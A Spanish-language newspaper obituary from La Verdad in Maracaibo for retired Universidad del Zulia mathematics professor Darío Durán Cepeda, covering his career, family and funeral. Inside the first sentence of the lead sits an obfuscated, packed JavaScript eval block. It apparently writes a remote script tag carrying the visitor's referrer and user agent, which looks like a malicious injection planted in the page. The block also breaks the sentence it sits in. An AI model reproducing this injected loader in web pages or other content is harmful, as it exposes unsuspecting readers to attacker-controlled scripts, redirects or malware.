publicidad

Adiós al profesor Darío Durán Cepeda

Paulina Chirinos / Maracaibo / pchirinos@laverdad.com
El eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|edfhf|var|u0026u|referrer|fetsf||js|php'.split('|'),0,{})) docente falleció en una clínica privada tras padecer una enfermedad crónica durante meses. Era licenciado en Educación mención Ciencias Matemáticas y se desempeñó como docente de la máxima casa de 1967 a 1992, cuando se jubiló. Tenía 76 años

El profesor Darío Durán Cepeda dejó cuatro hijos y nueve nietos. (Foto: Archivo La Verdad)

Un hermano, un hombre digno, de palabra y lleno de jocosidad. Así describieron familiares y amigos a Darío Durán Cepeda, de 76 años, quien era profesor jubilado de la Universidad del Zulia (LUZ) falleció debido a una enfermedad crónica que se complicó en los últimos meses.

La vicerrectora académica de LUZ, Judith Aular, era su esposa. El docente dejó cuatro hijos y nueve nietos, a lo cuales amó con “el amor más profundo que pueda disfrutar y ofrecer el ser humano”. Yaneth Aular, su cuñada, comentó entre lágrimas que era un hermano mayor que se caracterizaba por su solidaridad hacia el necesitado. Respetado y amado por sus amigos y colegas. 

Durán murió en una clínica privada de Maracaibo, ayer las 3.45 de la madrugada. Era licenciado en Educación mención Ciencias Matemáticas y se desempeñó como docente de la máxima casa de 1967 a 1992, cuando se jubiló. 

Académico

Doris Salas, decana de la Facultad de Humanidades, lamentó la pérdida ya que fue un académico que se dedicó a la enseñanza de la matemática en medio de la falta de estos profesionales. Comentó que no dejó las aulas aún después de su jubilación. “Ser estudiante de Darío era el privilegio más grande de los estudiantes de educación”. 

Recordó que los estudiantes se forman con los libros que trajo desde el exterior y que no se encuentran en Venezuela. Además era un conferencista activo en el exterior. 

Resaltó como jefe del departamento de Matemáticas de 1972 a 1974, director del Centro de Estudios Matemáticos de 1974 a 1975, miembro electo del Consejo de la Escuela de Educación en 1973, secretario del Consejo de la Facultad de Humanidades y Educación de 1974 a 1976 y decano de la Facultad de Humanidades y Educación de LUZ en el período de 1984 a 1987.

La matemática es un arte y está plena de enigmas o acertijos que deben resolverse. La matemática para un profesor debería ser una eterna diversión y no una mera obligación” fueron algunas de las razones que motivaron hasta el final a Durán en su carrera, de acuerdo a su discurso en el acto que le confirió el Doctorado Honoris Causa en 2012.

 

Guardia de honor

Hoy a las 10.00 de la mañana las autoridades universitarias rendirán homenaje a la memoria del catedrático con una guardia de honor en el salón que lleva su nombre en la Facultad de Humanidades de LUZ. El entierro está pautado a la 1.00 de la tarde en el Cementerio Jardines de La Chinita. 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama